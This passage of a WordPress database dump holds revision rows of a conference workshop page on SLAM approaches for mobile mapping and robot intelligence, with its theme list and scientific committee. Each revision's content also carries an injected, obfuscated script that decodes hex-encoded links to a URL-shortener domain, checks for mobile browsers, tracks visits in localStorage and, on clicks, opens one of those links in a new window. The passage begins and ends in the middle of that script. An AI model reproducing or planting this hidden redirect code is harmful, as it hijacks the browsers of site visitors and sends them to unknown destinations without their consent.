Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2022-10-07 20:50:59','2022-10-07 20:50:59','',2570,'https://gsw2023.com/?p=2592',0,'revision','',0),
(2593,1,'2022-10-07 20:52:52','2022-10-07 20:52:52','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"36\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Semantic and metric SLAM</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>New robotic mapping applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Robotic mapping benchmarks</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2022-10-07 20:52:52','2022-10-07 20:52:52','',2570,'https://gsw2023.com/?p=2593',0,'revision','',0),
(2594,1,'2022-10-07 20:53:55','2022-10-07 20:53:55','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h1 style=\"text-align: center;\">CHAIRS</h1>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"36\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Semantic and metric SLAM</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>New robotic mapping applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Robotic mapping benchmarks</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 